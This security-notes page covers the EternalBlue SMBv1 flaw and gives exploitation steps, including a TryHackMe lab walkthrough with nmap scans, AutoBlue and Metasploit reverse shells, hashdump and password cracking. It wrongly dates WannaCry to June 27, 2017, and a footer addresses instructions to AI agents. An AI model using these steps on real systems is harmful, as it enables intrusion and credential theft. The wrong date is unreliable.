# CVE-2017-0144: EternalBlue: MS17-010

{% embed url="<https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>" %}

**EternalBlue (MS17-010/CVE-2017-0144)** is a critical vulnerability in the Windows Server Message Block (SMBv1) protocol that allows attackers to remotely execute arbitrary code and gain access to a Windows system, potentially compromising the entire network. The exploit, developed by the NSA, was leaked by a hacker group called the Shadow Brokers in 2017.

## **Why the Vulnerability Occurs**

The vulnerability occurs due to improper handling of specially crafted SMBv1 packets, allowing attackers to send malicious packets to a vulnerable machine. This flaw enables attackers to execute arbitrary commands remotely without authentication.

The EternalBlue vulnerability occurs because of a **buffer overflow** in the Windows SMBv1 protocol caused by improper validation of transaction requests. Specifically, the vulnerability involves incorrectly handling the length of the input data fields and the error conditions, which allow attackers to execute arbitrary code remotely. This vulnerability leads to remote code execution with high-level privileges, making it a critical issue that can be exploited to propagate malware like WannaCry across networks.

{% embed url="<https://nvd.nist.gov/vuln/detail/cve-2017-0144>" %}

{% embed url="<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144>" %}

## **Key Features of EternalBlue**

* Exploits the SMBv1 vulnerability (MS17-010) in unpatched Windows systems.
* Affected versions include Windows Vista, 7, Server 2008, 8.1, Server 2012, 10, and Server 2016.
* Was infamously used in the WannaCry ransomware attack on June 27, 2017, which spread rapidly across networks.

Microsoft released a patch for the vulnerability in March 2017, but many systems remain unpatched, leaving them vulnerable to attacks.

## Exploitation

### MSF

[Vulnerability Scanning](/ollivanders/metasploit-framework/vulnerability-scanning.md#eternal-blue-exploit)

EternalBlue allows attackers to send crafted packets to a vulnerable system, gaining privileged access. It has an **MSF auxiliary module** to check if a system is vulnerable and an **exploit module** to execute the attack, granting a privileged session on unpatched systems. The exploit can also be manually executed using publicly available code.

{% embed url="<https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution>" %}

### AutoBlue

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

{% code overflow="wrap" %}

```bash
# nmap for vulnerability assessment
nmap -sV [IP]
nmap -sV -p 445 --script smb-vuln-ms17-010 [IP]

# using autoblue
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
pip install -r requirements.txt

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

nc -lvnp 1234
chmod +x eternalblue_exploit_winx.py
python eternalblue_exploit_winx.py [Victim IP] shellcode/sc_x64.bin

# command shell on the listening port
```

{% endcode %}

### TryHackMe:Blue Exploitation

{% embed url="<https://tryhackme.com/r/room/blue>" %}

```bash
# scan the machine
sudo nmap -Pn -sV -O -sS 10.10.17.20 -oX nmap-blue.xml
```

#### w/ MSF

```bash
db_import nmap-blue.xml
setg 10.10.17.20

# search and use scanning module
search type:auxiliary name:ms17
use auxiliary/scanner/smb/smb_ms17_010
run

# search and exploit -- easy way
search type:exploit name:ms17
use exploit/windows/smb/ms17_010_eternalblue

# search and exploit -- hard and developed way
set payload windows/x64/shell/reverse_tcp
exploit

# escalate shell to meterpreter session
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

# use the meterpreter session
sessions
sessions -i 2

# cracking
hashdump
# using john
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
# flag
meterpreter> search -f flag*.txt
```

#### w/ AutoBlue

```bash
# in the autoblue directory
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh

# reverse shell
nc -lvnp 4567
python eternalblue_exploit_winx.py 10.10.17.20 shellcode/sc_x64.bin
```

#### other Semi MSF

<figure><img src="/files/T5NYasIep8P9mWGLrFyt" alt=""><figcaption></figcaption></figure>

{% embed url="<https://redteamzone.com/EternalBlue/>" %}

{% embed url="<https://medium.com/@dw3113r/hack-the-box-blue-writeup-without-metasploit-1c6f7e3c586c>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.navidnaf.com/flaws-w-magical-frameworks/windows/cve-2017-0144-eternalblue-ms17-010.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.